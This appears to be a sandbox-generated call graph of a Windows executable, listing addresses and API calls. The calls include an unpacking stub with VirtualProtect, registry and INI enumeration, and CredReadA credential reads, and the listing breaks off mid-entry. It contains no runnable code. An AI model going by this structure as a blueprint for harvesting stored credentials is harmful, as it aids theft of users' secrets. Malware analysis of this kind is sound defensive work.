34177 40c8b8 19 API calls 34179 4118bf RtlTryEnterCriticalSection 34373 42434a 18 API calls __fprintf_l 34375 405f53 12 API calls 34187 43f956 59 API calls 34189 40955a 17 API calls 34190 428561 36 API calls 34191 409164 7 API calls 34379 404366 19 API calls 34383 40176c ExitProcess 34386 410777 42 API calls 34196 40dd7b 51 API calls 34197 425d7c 16 API calls __fprintf_l 34388 43f6f0 25 API calls 34389 42db01 22 API calls 34198 412905 15 API calls __fprintf_l 34390 403b04 54 API calls 34391 405f04 SetDlgItemTextA GetDlgItemTextA 34392 44b301 ??3@YAXPAX 34395 4120ea 14 API calls 3 library calls 34396 40bb0a 8 API calls 34398 413f11 strcmp 34202 434110 17 API calls __fprintf_l 34205 425115 108 API calls __fprintf_l 34399 444b11 _onexit 34207 425115 76 API calls __fprintf_l 34210 429d19 10 API calls 34402 444b1f __dllonexit 34403 409f20 _strcmpi 34212 42b927 31 API calls 34406 433f26 19 API calls __fprintf_l 34407 44b323 FreeLibrary 34408 427f25 46 API calls 34409 43ff2b 17 API calls 34410 43fb30 19 API calls 34219 414d36 16 API calls 34221 40ad38 7 API calls 34412 433b38 16 API calls __fprintf_l 34092 44b33b 34093 44b344 ??3@YAXPAX 34092->34093 34094 44b34b 34092->34094 34093->34094 34095 44b354 ??3@YAXPAX 34094->34095 34096 44b35b 34094->34096 34095->34096 34097 44b364 ??3@YAXPAX 34096->34097 34098 44b36b 34096->34098 34097->34098 34099 44b374 ??3@YAXPAX 34098->34099 34100 44b37b 34098->34100 34099->34100 34225 426741 21 API calls 34226 40c5c3 125 API calls 34228 43fdc5 17 API calls 34413 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34231 4161cb memcpy memcpy memcpy memcpy 33172 44b3cf 33173 44b3e6 33172->33173 33178 44b454 33172->33178 33173->33178 33185 44b40e GetModuleHandleA 33173->33185 33175 44b45d GetModuleHandleA 33179 44b467 33175->33179 33176 44b49a 33198 44b49f 33176->33198 33178->33175 33178->33176 33178->33179 33179->33178 33180 44b487 GetProcAddress 33179->33180 33180->33178 33181 44b405 33181->33178 33181->33179 33182 44b428 GetProcAddress 33181->33182 33182->33178 33183 44b435 VirtualProtect 33182->33183 33183->33178 33184 44b444 VirtualProtect 33183->33184 33184->33178 33186 44b417 33185->33186 33188 44b454 33185->33188 33217 44b42b GetProcAddress 33186->33217 33190 44b45d GetModuleHandleA 33188->33190 33191 44b49a 33188->33191 33197 44b467 33188->33197 33189 44b41c 33189->33188 33193 44b428 GetProcAddress 33189->33193 33190->33197 33192 44b49f 776 API calls 33191->33192 33192->33191 33193->33188 33194 44b435 VirtualProtect 33193->33194 33194->33188 33195 44b444 VirtualProtect 33194->33195 33195->33188 33196 44b487 GetProcAddress 33196->33188 33197->33188 33197->33196 33199 444c4a 33198->33199 33200 444c56 GetModuleHandleA 33199->33200 33201 444c68 __set_app_type __p__fmode __p__commode 33200->33201 33203 444cfa 33201->33203 33204 444d02 __setusermatherr 33203->33204 33205 444d0e 33203->33205 33204->33205 33226 444e22 _controlfp 33205->33226 33207 444d13 _initterm __getmainargs _initterm 33208 444d6a GetStartupInfoA 33207->33208 33210 444d9e GetModuleHandleA 33208->33210 33227 40cf44 33210->33227 33214 444dcf _cexit 33216 444e04 33214->33216 33215 444dc8 exit 33215->33214 33216->33176 33218 44b454 33217->33218 33219 44b435 VirtualProtect 33217->33219 33221 44b45d GetModuleHandleA 33218->33221 33222 44b49a 33218->33222 33219->33218 33220 44b444 VirtualProtect 33219->33220 33220->33218 33225 44b467 33221->33225 33223 44b49f 776 API calls 33222->33223 33223->33222 33224 44b487 GetProcAddress 33224->33225 33225->33218 33225->33224 33226->33207 33278 404a99 LoadLibraryA 33227->33278 33229 40cf60 33266 40cf64 33229->33266 33285 410d0e 33229->33285 33231 40cf6f 33289 40ccd7 ??2@YAPAXI 33231->33289 33233 40cf9b 33303 407cbc 33233->33303 33238 40cfc4 33321 409825 memset 33238->33321 33239 40cfd8 33326 4096f4 memset 33239->33326 33244 40d181 ??3@YAXPAX 33246 40d1b3 33244->33246 33247 40d19f DeleteObject 33244->33247 33245 407e30 _strcmpi 33248 40cfee 33245->33248 33350 407948 free free 33246->33350 33247->33246 33250 40cff2 RegDeleteKeyA 33248->33250 33251 40d007 EnumResourceTypesA 33248->33251 33250->33244 33253 40d047 33251->33253 33254 40d02f MessageBoxA 33251->33254 33252 40d1c4 33351 4080d4 free 33252->33351 33256 40d0a0 CoInitialize 33253->33256 33331 40ce70 33253->33331 33254->33244 33348 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33348 33259 40d1cd 33352 407948 free free 33259->33352 33261 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33349 40c256 PostMessageA 33261->33349 33263 40d061 ??3@YAXPAX 33263->33246 33267 40d084 DeleteObject 33263->33267 33264 40d09e 33264->33256 33266->33214 33266->33215 33267->33246 33270 40d0f9 GetMessageA 33271 40d17b CoUninitialize 33270->33271 33272 40d10d 33270->33272 33271->33244 33273 40d113 TranslateAccelerator 33272->33273 33275 40d145 IsDialogMessage 33272->33275 33276 40d139 IsDialogMessage 33272->33276 33273->33272 33274 40d16d GetMessageA 33273->33274 33274->33271 33274->33273 33275->33274 33277 40d157 TranslateMessage DispatchMessageA 33275->33277 33276->33274 33276->33275 33277->33274 33279 404ac4 GetProcAddress 33278->33279 33280 404ae8 33278->33280 33281 404ad4 33279->33281 33282 404add FreeLibrary 33279->33282 33283 404b13 33280->33283 33284 404afc MessageBoxA 33280->33284 33281->33282 33282->33280 33283->33229 33284->33229 33286 410d17 LoadLibraryA 33285->33286 33287 410d3c 33285->33287 33286->33287 33288 410d2b GetProcAddress 33286->33288 33287->33231 33288->33287 33290 40cd08 ??2@YAPAXI 33289->33290 33292 40cd26 33290->33292 33293 40cd2d 33290->33293 33360 404025 6 API calls 33292->33360 33295 40cd66 33293->33295 33296 40cd59 DeleteObject 33293->33296 33353 407088 33295->33353 33296->33295 33298 40cd6b 33356 4019b5 33298->33356 33301 4019b5 strncat 33302 40cdbf _mbscpy 33301->33302 33302->33233 33362 407948 free free 33303->33362 33307 407a1f malloc memcpy free free 33310 407cf7 33307->33310 33308 407ddc 33316 407e04 33308->33316 33375 407a1f 33308->33375 33310->33307 33310->33308 33311 407d7a free 33310->33311 33310->33316 33366 40796e 7 API calls 33310->33366 33367 406f30 33310->33367 33311->33310 33363 407a55 33316->33363 33317 407e30 33318 407e57 33317->33318 33319 407e38 33317->33319 33318->33238 33318->33239 33319->33318 33320 407e41 _strcmpi 33319->33320 33320->33318 33320->33319 33381 4097ff 33321->33381 33323 409854 33386 409731 33323->33386 33327 4097ff 3 API calls 33326->33327 33328 409723 33327->33328 33406 40966c 33328->33406 33420 4023b2 33331->33420 33336 40ced3 33509 40cdda 7 API calls 33336->33509 33337 40cece 33341 40cf3f 33337->33341 33461 40c3d0 memset GetModuleFileNameA strrchr 33337->33461 33341->33263 33341->33264 33344 40ceed 33488 40affa 33344->33488 33348->33261 33349->33270 33350->33252 33351->33259 33352->33266 33361 406fc7 memset _mbscpy 33353->33361 33355 40709f CreateFontIndirectA 33355->33298 33357 4019e1 33356->33357 33358 4019c2 strncat 33357->33358 33359 4019e5 memset LoadIconA 33357->33359 33358->33357 33359->33301 33360->33293 33361->33355 33362->33310 33364 407a65 33363->33364 33365 407a5b free 33363->33365 33364->33317 33365->33364 33366->33310 33368 406f37 malloc 33367->33368 33369 406f7d 33367->33369 33371 406f73 33368->33371 33372 406f58 33368->33372 33369->33310 33371->33310 33373 406f6c free 33372->33373 33374 406f5c memcpy 33372->33374 33373->33371 33374->33373 33376 407a38 33375->33376 33377 407a2d free 33375->33377 33378 406f30 3 API calls 33376->33378 33379 407a43 33377->33379 33378->33379 33380 40796e 7 API calls 33379->33380 33380->33316 33397 406f96 GetModuleFileNameA 33381->33397 33383 409805 strrchr 33384 409814 33383->33384 33385 409817 _mbscat 33383->33385 33384->33385 33385->33323 33398 44b090 33386->33398 33391 40930c 3 API calls 33392 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33391->33392 33393 4097c5 LoadStringA 33392->33393 33394 4097db 33393->33394 33394->33393 33396 4097f3 33394->33396 33405 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33394->33405 33396->33244 33397->33383 33399 40973e _mbscpy _mbscpy 33398->33399 33400 40930c 33399->33400 33401 44b090 33400->33401 33402 409319 memset GetPrivateProfileStringA 33401->33402 33403 409374 33402->33403 33404 409364 WritePrivateProfileStringA 33402->33404 33403->33391 33404->33403 33405->33394 33416 406f81 GetFileAttributesA 33406->33416 33408 409675 33409 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33408->33409 33415 4096ee 33408->33415 33417 409278 GetPrivateProfileStringA 33409->33417 33411 4096c9 33418 409278 GetPrivateProfileStringA 33411->33418 33413 4096da 33419 409278 GetPrivateProfileStringA 33413->33419 33415->33245 33416->33408 33417->33411 33418->33413 33419->33415 33511 409c1c 33420->33511 33423 401e69 memset 33550 410dbb 33423->33550 33426 401ec2 33580 4070e3 strlen _mbscat _mbscpy _mbscat 33426->33580 33427 401ed4 33565 406f81 GetFileAttributesA 33427->33565 33430 401ee6 strlen strlen 33432 401f15 33430->33432 33433 401f28 33430->33433 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33432->33581 33566 406f81 GetFileAttributesA 33433->33566 33436 401f35 33567 401c31 33436->33567 33439 401f75 33579 410a9c RegOpenKeyExA 33439->33579 33440 401c31 7 API calls 33440->33439 33442 401f91 33443 402187 33442->33443 33444 401f9c memset 33442->33444 33446 402195 ExpandEnvironmentStringsA 33443->33446 33447 4021a8 _strcmpi 33443->33447 33582 410b62 RegEnumKeyExA 33444->33582 33591 406f81 GetFileAttributesA 33446->33591 33447->33336 33447->33337 33449 40217e RegCloseKey 33449->33443 33450 401fd9 atoi 33451 401fef memset memset sprintf 33450->33451 33459 401fc9 33450->33459 33583 410b1e 33451->33583 33454 402165 33454->33449 33455 402076 memset memset strlen strlen 33455->33459 33456 4070e3 strlen _mbscat _mbscpy _mbscat 33456->33459 33457 4020dd strlen strlen 33457->33459 33458 406f81 GetFileAttributesA 33458->33459 33459->33449 33459->33450 33459->33454 33459->33455 33459->33456 33459->33457 33459->33458 33460 402167 _mbscpy 33459->33460 33590 410b62 RegEnumKeyExA 33459->33590 33460->33449 33462 40c422 33461->33462 33463 40c425 _mbscat _mbscpy _mbscpy 33461->33463 33462->33463 33464 40c49d 33463->33464 33465 40c512 33464->33465 33466 40c502 GetWindowPlacement 33464->33466 33467 40c538 33465->33467 33612 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33465->33612 33466->33465 33605 409b31 33467->33605 33471 40ba28 33472 40ba87 33471->33472 33478 40ba3c 33471->33478 33615 406c62 LoadCursorA SetCursor 33472->33615 33474 40ba8c 33616 4107f1 33474->33616 33619 403c16 33474->33619 33695 410a9c RegOpenKeyExA 33474->33695 33696 404734 33474->33696 33704 404785 33474->33704 33475 40ba43 _mbsicmp 33475->33478 33476 40baa0 33477 407e30 _strcmpi 33476->33477 33481 40bab0 33477->33481 33478->33472 33478->33475 33707 40b5e5 10 API calls 33478->33707 33479 40bafa SetCursor 33479->33344 33481->33479 33482 40baf1 qsort 33481->33482 33482->33479 34067 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33488->34067 33490 40b00e 33491 40b016 33490->33491 33492 40b01f GetStdHandle 33490->33492 34068 406d1a CreateFileA 33491->34068 33494 40b01c 33492->33494 33495 40b035 33494->33495 33496 40b12d 33494->33496 34069 406c62 LoadCursorA SetCursor 33495->34069 34073 406d77 9 API calls 33496->34073 33499 40b136 33510 40c580 28 API calls 33499->33510 33500 40b087 33507 40b0a1 33500->33507 34071 40a699 12 API calls 33500->34071 33501 40b042 33501->33500 33501->33507 34070 40a57c strlen WriteFile 33501->34070 33504 40b0d6 33505 40b116 CloseHandle 33504->33505 33506 40b11f SetCursor 33504->33506 33505->33506 33506->33499 33507->33504 34072 406d77 9 API calls 33507->34072 33509->33337 33510->33341 33523 409a32 33511->33523 33514 409c80 memcpy memcpy 33515 409cda 33514->33515 33515->33514 33516 409d18 ??2@YAPAXI ??2@YAPAXI 33515->33516 33517 408db6 12 API calls 33515->33517 33519 409d54 ??2@YAPAXI 33516->33519 33520 409d8b 33516->33520 33517->33515 33519->33520 33533 409b9c 33520->33533 33522 4023c1 33522->33423 33524 409a44 33523->33524 33525 409a3d ??3@YAXPAX 33523->33525 33526 409a52 33524->33526 33527 409a4b ??3@YAXPAX 33524->33527 33525->33524 33528 409a63 33526->33528 33529 409a5c ??3@YAXPAX 33526->33529 33527->33526 33530 409a83 ??2@YAPAXI ??2@YAPAXI 33528->33530 33531 409a73 ??3@YAXPAX 33528->33531 33532 409a7c ??3@YAXPAX 33528->33532 33529->33528 33530->33514 33531->33532 33532->33530 33534 407a55 free 33533->33534 33535 409ba5 33534->33535 33536 407a55 free 33535->33536 33537 409bad 33536->33537 33538 407a55 free 33537->33538 33539 409bb5 33538->33539 33540 407a55 free 33539->33540 33541 409bbd 33540->33541 33542 407a1f 4 API calls 33541->33542 33543 409bd0 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bda 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409be4 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409bee 33548->33549 33549->33522 33551 410d0e 2 API calls 33550->33551 33552 410dca 33551->33552 33553 410dfd memset 33552->33553 33592 4070ae 33552->33592 33555 410e1d 33553->33555 33595 410a9c RegOpenKeyExA 33555->33595 33557 401e9e strlen strlen 33557->33426 33557->33427 33559 410e4a 33560 410e7f _mbscpy 33559->33560 33596 410d3d _mbscpy 33559->33596 33560->33557 33562 410e5b 33597 410add RegQueryValueExA 33562->33597 33564 410e73 RegCloseKey 33564->33560 33565->33430 33566->33436 33598 410a9c RegOpenKeyExA 33567->33598 33569 401c4c 33570 401cad 33569->33570 33599 410add RegQueryValueExA 33569->33599 33570->33439 33570->33440 33572 401c6a 33573 401c71 strchr 33572->33573 33574 401ca4 RegCloseKey 33572->33574 33573->33574 33575 401c85 strchr 33573->33575 33574->33570 33575->33574 33576 401c94 33575->33576 33600 406f06 strlen 33576->33600 33578 401ca1 33578->33574 33579->33442 33580->33427 33581->33433 33582->33459 33603 410a9c RegOpenKeyExA 33583->33603 33585 410b34 33586 410b5d 33585->33586 33604 410add RegQueryValueExA 33585->33604 33586->33459 33588 410b4c RegCloseKey 33588->33586 33590->33459 33591->33447 33593 4070bd GetVersionExA 33592->33593 33594 4070ce 33592->33594 33593->33594 33594->33553 33594->33557 33595->33559 33596->33562 33597->33564 33598->33569 33599->33572 33601 406f17 33600->33601 33602 406f1a memcpy 33600->33602 33601->33602 33602->33578 33603->33585 33604->33588 33606 409b40 33605->33606 33607 409b4e 33605->33607 33613 409901 memset SendMessageA 33606->33613 33609 409b99 33607->33609 33610 409b8b 33607->33610 33609->33471 33614 409868 SendMessageA 33610->33614 33612->33467 33613->33607 33614->33609 33615->33474 33617 410807 33616->33617 33618 4107fc FreeLibrary 33616->33618 33617->33476 33618->33617 33620 4107f1 FreeLibrary 33619->33620 33621 403c30 LoadLibraryA 33620->33621 33622 403c74 33621->33622 33623 403c44 GetProcAddress 33621->33623 33625 4107f1 FreeLibrary 33622->33625 33623->33622 33624 403c5e 33623->33624 33624->33622 33628 403c6b 33624->33628 33626 403c7b 33625->33626 33627 404734 3 API calls 33626->33627 33629 403c86 33627->33629 33628->33626 33708 4036e5 33629->33708 33632 4036e5 27 API calls 33633 403c9a 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403ca4 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403cae 33636->33637 33720 4085d2 33637->33720 33645 403ce5 33646 403cf7 33645->33646 33901 402bd1 40 API calls 33645->33901 33766 410a9c RegOpenKeyExA 33646->33766 33649 403d0a 33650 403d1c 33649->33650 33902 402bd1 40 API calls 33649->33902 33767 402c5d 33650->33767 33654 4070ae GetVersionExA 33655 403d31 33654->33655 33785 410a9c RegOpenKeyExA 33655->33785 33657 403d51 33658 403d61 33657->33658 33903 402b22 47 API calls 33657->33903 33786 410a9c RegOpenKeyExA 33658->33786 33661 403d87 33662 403d97 33661->33662 33904 402b22 47 API calls 33661->33904 33787 410a9c RegOpenKeyExA 33662->33787 33665 403dbd 33666 403dcd 33665->33666 33905 402b22 47 API calls 33665->33905 33788 410808 33666->33788 33670 404785 FreeLibrary 33671 403de8 33670->33671 33792 402fdb 33671->33792 33674 402fdb 34 API calls 33675 403e00 33674->33675 33808 4032b7 33675->33808 33684 403e3b 33685 403e73 33684->33685 33686 403e46 _mbscpy 33684->33686 33855 40fb00 33685->33855 33907 40f334 334 API calls 33686->33907 33695->33476 33697 404785 FreeLibrary 33696->33697 33698 40473b LoadLibraryA 33697->33698 33699 40474c GetProcAddress 33698->33699 33700 40476e 33698->33700 33699->33700 33701 404764 33699->33701 33702 404781 33700->33702 33703 404785 FreeLibrary 33700->33703 33701->33700 33702->33476 33703->33702 33705 4047a3 33704->33705 33706 404799 FreeLibrary 33704->33706 33705->33476 33706->33705 33707->33478 33709 4036fb 33708->33709 33712 4037c5 33708->33712 33908 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33709->33908 33711 40370e 33711->33712 33713 403716 strchr 33711->33713 33712->33632 33713->33712 33714 403730 33713->33714 33909 4021b6 memset 33714->33909 33716 40373f _mbscpy _mbscpy strlen 33717 4037a4 _mbscpy 33716->33717 33718 403789 sprintf 33716->33718 33910 4023e5 16 API calls 33717->33910 33718->33717 33721 4085e2 33720->33721 33911 4082cd 11 API calls 33721->33911 33725 408600 33726 403cba 33725->33726 33727 40860b memset 33725->33727 33738 40821d 33726->33738 33914 410b62 RegEnumKeyExA 33727->33914 33729 408637 33730 4086d2 RegCloseKey 33729->33730 33732 40865c memset 33729->33732 33915 410a9c RegOpenKeyExA 33729->33915 33918 410b62 RegEnumKeyExA 33729->33918 33730->33726 33916 410add RegQueryValueExA 33732->33916 33735 408694 33917 40848b 10 API calls 33735->33917 33737 4086ab RegCloseKey 33737->33729 33919 410a9c RegOpenKeyExA 33738->33919 33740 40823f 33741 403cc6 33740->33741 33742 408246 memset 33740->33742 33750 4086e0 33741->33750 33920 410b62 RegEnumKeyExA 33742->33920 33744 4082bf RegCloseKey 33744->33741 33746 40826f 33746->33744 33921 410a9c RegOpenKeyExA 33746->33921 33922 4080ed 11 API calls 33746->33922 33923 410b62 RegEnumKeyExA 33746->33923 33749 4082a2 RegCloseKey 33749->33746 33924 4045db 33750->33924 33755 408737 wcslen 33756 4088ef 33755->33756 33762 40876a 33755->33762 33932 404656 33756->33932 33757 40877a wcsncmp 33757->33762 33759 404734 3 API calls 33759->33762 33760 404785 FreeLibrary 33760->33762 33761 408812 memset 33761->33762 33763 40883c memcpy wcschr 33761->33763 33762->33756 33762->33757 33762->33759 33762->33760 33762->33761 33762->33763 33764 4088c3 LocalFree 33762->33764 33935 40466b _mbscpy 33762->33935 33763->33762 33764->33762 33765 410a9c RegOpenKeyExA 33765->33645 33766->33649 33936 410a9c RegOpenKeyExA 33767->33936 33769 402c7a 33770 402da5 33769->33770 33771 402c87 memset 33769->33771 33770->33654 33937 410b62 RegEnumKeyExA 33771->33937 33773 402d9c RegCloseKey 33773->33770 33774 410b1e 3 API calls 33775 402ce4 memset sprintf 33774->33775 33938 410a9c RegOpenKeyExA 33775->33938 33777 402d28 33778 402d3a sprintf 33777->33778 33939 402bd1 40 API calls 33777->33939 33940 410a9c RegOpenKeyExA 33778->33940 33781 402cb2 33781->33773 33781->33774 33784 402d9a 33781->33784 33941 402bd1 40 API calls 33781->33941 33942 410b62 RegEnumKeyExA 33781->33942 33784->33773 33785->33657 33786->33661 33787->33665 33789 410816 33788->33789 33790 4107f1 FreeLibrary 33789->33790 33791 403ddd 33790->33791 33791->33670 33943 410a9c RegOpenKeyExA 33792->33943 33794 402ff9 33795 403006 memset 33794->33795 33796 40312c 33794->33796 33944 410b62 RegEnumKeyExA 33795->33944 33796->33674 33798 403122 RegCloseKey 33798->33796 33799 410b1e 3 API calls 33800 403058 memset sprintf 33799->33800 33945 410a9c RegOpenKeyExA 33800->33945 33802 403033 33802->33798 33802->33799 33803 4030a2 memset 33802->33803 33804 410b62 RegEnumKeyExA 33802->33804 33806 4030f9 RegCloseKey 33802->33806 33947 402db3 26 API calls 33802->33947 33946 410b62 RegEnumKeyExA 33803->33946 33804->33802 33806->33802 33809 4032d5 33808->33809 33810 4033a9 33808->33810 33948 4021b6 memset 33809->33948 33823 4034e4 memset memset 33810->33823 33812 4032e1 33949 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33812->33949 33814 4032ea 33815 4032f8 memset GetPrivateProfileSectionA 33814->33815 33950 4023e5 16 API calls 33814->33950 33815->33810 33820 40332f 33815->33820 33817 40339b strlen 33817->33810 33817->33820 33819 403350 strchr 33819->33820 33820->33810 33820->33817 33951 4021b6 memset 33820->33951 33952 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33820->33952 33953 4023e5 16 API calls 33820->33953 33824 410b1e 3 API calls 33823->33824 33825 40353f 33824->33825 33826 40357f 33825->33826 33827 403546 _mbscpy 33825->33827 33831 403985 33826->33831 33954 406d55 strlen _mbscat 33827->33954 33829 403565 _mbscat 33955 4033f0 19 API calls 33829->33955 33956 40466b _mbscpy 33831->33956 33835 4039aa 33837 4039ff 33835->33837 33957 40f460 memset memset 33835->33957 33978 40f6e2 33835->33978 33996 4038e8 21 API calls 33835->33996 33838 404785 FreeLibrary 33837->33838 33839 403a0b 33838->33839 33840 4037ca memset memset 33839->33840 34004 444551 memset 33840->34004 33843 4038e2 33843->33684 33906 40f334 334 API calls 33843->33906 33845 40382e 33846 406f06 2 API calls 33845->33846 33847 403843 33846->33847 33848 406f06 2 API calls 33847->33848 33849 403855 strchr 33848->33849 33850 403884 _mbscpy 33849->33850 33851 403897 strlen 33849->33851 33853 4038bf _mbscpy 33850->33853 33852 4038a4 sprintf 33851->33852 33851->33853 33852->33853 34016 4023e5 16 API calls 33853->34016 33856 44b090 33855->33856 33857 40fb10 RegOpenKeyExA 33856->33857 33858 403e7f 33857->33858 33859 40fb3b RegOpenKeyExA 33857->33859 33869 40f96c 33858->33869 33860 40fb55 RegQueryValueExA 33859->33860 33861 40fc2d RegCloseKey 33859->33861 33862 40fc23 RegCloseKey 33860->33862 33863 40fb84 33860->33863 33861->33858 33862->33861 33864 404734 3 API calls 33863->33864 33865 40fb91 33864->33865 33865->33862 33866 40fc19 LocalFree 33865->33866 33867 40fbdd memcpy memcpy 33865->33867 33866->33862 34021 40f802 11 API calls 33867->34021 33870 4070ae GetVersionExA 33869->33870 33871 40f98d 33870->33871 33872 4045db 7 API calls 33871->33872 33876 40f9a9 33872->33876 33873 40fae6 33874 404656 FreeLibrary 33873->33874 33875 403e85 33874->33875 33881 4442ea memset 33875->33881 33876->33873 33877 40fa13 memset WideCharToMultiByte 33876->33877 33877->33876 33878 40fa43 _strnicmp 33877->33878 33878->33876 33879 40fa5b WideCharToMultiByte 33878->33879 33879->33876 33880 40fa88 WideCharToMultiByte 33879->33880 33880->33876 33882 410dbb 9 API calls 33881->33882 33883 444329 33882->33883 34022 40759e strlen strlen 33883->34022 33888 410dbb 9 API calls 33889 444350 33888->33889 33890 40759e 3 API calls 33889->33890 33891 44435a 33890->33891 33892 444212 65 API calls 33891->33892 33893 444366 memset memset 33892->33893 33894 410b1e 3 API calls 33893->33894 33895 4443b9 ExpandEnvironmentStringsA strlen 33894->33895 33896 4443f4 _strcmpi 33895->33896 33897 4443e5 33895->33897 33898 403e91 33896->33898 33899 44440c 33896->33899 33897->33896 33898->33476 33900 444212 65 API calls 33899->33900 33900->33898 33901->33646 33902->33650 33903->33658 33904->33662 33905->33666 33906->33684 33907->33685 33908->33711 33909->33716 33910->33712 33912 40841c 33911->33912 33913 410a9c RegOpenKeyExA 33912->33913 33913->33725 33914->33729 33915->33729 33916->33735 33917->33737 33918->33729 33919->33740 33920->33746 33921->33746 33922->33749 33923->33746 33925 404656 FreeLibrary 33924->33925 33926 4045e3 LoadLibraryA 33925->33926 33927 404651 33926->33927 33928 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33926->33928 33927->33755 33927->33756 33929 40463d 33928->33929 33930 404643 33929->33930 33931 404656 FreeLibrary 33929->33931 33930->33927 33931->33927 33933 403cd2 33932->33933 33934 40465c FreeLibrary 33932->33934 33933->33765 33934->33933 33935->33762 33936->33769 33937->33781 33938->33777 33939->33778 33940->33781 33941->33781 33942->33781 33943->33794 33944->33802 33945->33802 33946->33802 33947->33802 33948->33812 33949->33814 33950->33815 33951->33819 33952->33820 33953->33820 33954->33829 33955->33826 33956->33835 33997 4078ba 33957->33997 33960 4078ba _mbsnbcat 33961 40f5a3 RegOpenKeyExA 33960->33961 33962 40f5c3 RegQueryValueExA 33961->33962 33963 40f6d9 33961->33963 33964 40f6d0 RegCloseKey 33962->33964 33965 40f5f0 33962->33965 33963->33835 33964->33963 33965->33964 33966 40f675 33965->33966 34001 40466b _mbscpy 33965->34001 33966->33964 34002 4012ee strlen 33966->34002 33968 40f611 33970 404734 3 API calls 33968->33970 33975 40f616 33970->33975 33971 40f69e RegQueryValueExA 33971->33964 33972 40f6c1 33971->33972 33972->33964 33973 40f66a 33974 404785 FreeLibrary 33973->33974 33974->33966 33975->33973 33976 40f661 LocalFree 33975->33976 33977 40f645 memcpy 33975->33977 33976->33973 33977->33976 34003 40466b _mbscpy 33978->34003 33980 40f6fa 33981 4045db 7 API calls 33980->33981 33982 40f708 33981->33982 33983 40f7e2 33982->33983 33984 404734 3 API calls 33982->33984 33985 404656 FreeLibrary 33983->33985 33986 40f715 33984->33986 33987 40f7f1 33985->33987 33986->33983 33988 40f71d CredReadA 33986->33988 33989 404785 FreeLibrary 33987->33989 33988->33983 33991 40f734 33988->33991 33990 40f7fc 33989->33990 33990->33835 33991->33983 33991->33991 33992 40f797 WideCharToMultiByte 33991->33992 33993 40f7b8 strlen 33992->33993 33994 40f7d9 LocalFree 33992->33994 33993->33994 33995 40f7c8 _mbscpy 33993->33995 33994->33983 33995->33994 33996->33835 33998 4078e6 33997->33998 33999 4078c7 _mbsnbcat 33998->33999 34000 4078ea 33998->34000 33999->33998 34000->33960 34001->33968 34002->33971 34003->33980 34017 410a9c RegOpenKeyExA 34004->34017 34006 44458b 34007 40381a 34006->34007 34018 410add RegQueryValueExA 34006->34018 34007->33843 34015 4021b6 memset 34007->34015 34009 4445dc RegCloseKey 34009->34007 34010 4445a4 34010->34009 34019 410add RegQueryValueExA 34010->34019 34012 4445c1 34012->34009 34020 444879 30 API calls 34012->34020 34014 4445da 34014->34009 34015->33845 34016->33843 34017->34006 34018->34010 34019->34012 34020->34014 34021->33866 34023 4075c9 34022->34023 34024 4075bb _mbscat 34022->34024 34025 444212 34023->34025 34024->34023 34042 407e9d 34025->34042 34028 44424d 34029 444274 34028->34029 34030 444258 34028->34030 34050 407ef8 34028->34050 34031 407e9d 9 API calls 34029->34031 34063 444196 52 API calls 34030->34063 34038 4442a0 34031->34038 34033 407ef8 9 API calls 34033->34038 34034 4442ce 34060 407f90 34034->34060 34038->34033 34038->34034 34040 444212 65 API calls 34038->34040 34064 407e62 strcmp strcmp 34038->34064 34039 407f90 FindClose 34041 4442e4 34039->34041 34040->34038 34041->33888 34043 407f90 FindClose 34042->34043 34044 407eaa 34043->34044 34045 406f06 2 API calls 34044->34045 34046 407ebd strlen strlen 34045->34046 34047 407ee1 34046->34047 34048 407eea 34046->34048 34065 4070e3 strlen _mbscat _mbscpy _mbscat 34047->34065 34048->34028 34051 407f03 FindFirstFileA 34050->34051 34052 407f24 FindNextFileA 34050->34052 34053 407f3f 34051->34053 34054 407f46 strlen strlen 34052->34054 34055 407f3a 34052->34055 34053->34054 34057 407f7f 34053->34057 34054->34057 34058 407f76 34054->34058 34056 407f90 FindClose 34055->34056 34056->34053 34057->34028 34066 4070e3 strlen _mbscat _mbscpy _mbscat 34058->34066 34061 407fa3 34060->34061 34062 407f99 FindClose 34060->34062 34061->34039 34062->34061 34063->34028 34064->34038 34065->34048 34066->34057 34067->33490 34068->33494 34069->33501 34070->33500 34071->33507 34072->33504 34073->33499 34418 43ffc8 18 API calls 34232 4281cc 15 API calls __fprintf_l 34420 4383cc 110 API calls __fprintf_l 34233 4275d3 41 API calls 34421 4153d3 22 API calls __fprintf_l 34234 444dd7 _XcptFilter 34426 4013de 15 API calls 34428 425115 111 API calls __fprintf_l 34429 43f7db 18 API calls 34432 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34236 4335ee 16 API calls __fprintf_l 34434 429fef 11 API calls 34237 444deb _exit _c_exit 34435 40bbf0 138 API calls 34240 425115 79 API calls __fprintf_l 34439 437ffa 22 API calls 34244 4021ff 14 API calls 34245 43f5fc 149 API calls 34440 40e381 9 API calls 34247 405983 40 API calls 34248 42b186 27 API calls __fprintf_l 34249 427d86 76 API calls 34250 403585 20 API calls 34252 42e58e 18 API calls __fprintf_l 34255 425115 75 API calls __fprintf_l 34257 401592 8 API calls 33158 410b92 33161 410a6b 33158->33161 33160 410bb2 33162 410a77 33161->33162 33163 410a89 GetPrivateProfileIntA 33161->33163 33166 410983 memset _itoa WritePrivateProfileStringA 33162->33166 33163->33160 33165 410a84 33165->33160 33166->33165 34444 434395 16 API calls 34259 441d9c memcmp 34446 43f79b 119 API calls 34260 40c599 43 API calls 34447 426741 87 API calls 34264 4401a6 21 API calls 34266 426da6 memcpy memset memset memcpy 34267 4335a5 15 API calls 34269 4299ab memset memset memcpy memset memset 34270 40b1ab 8 API calls 34452 425115 76 API 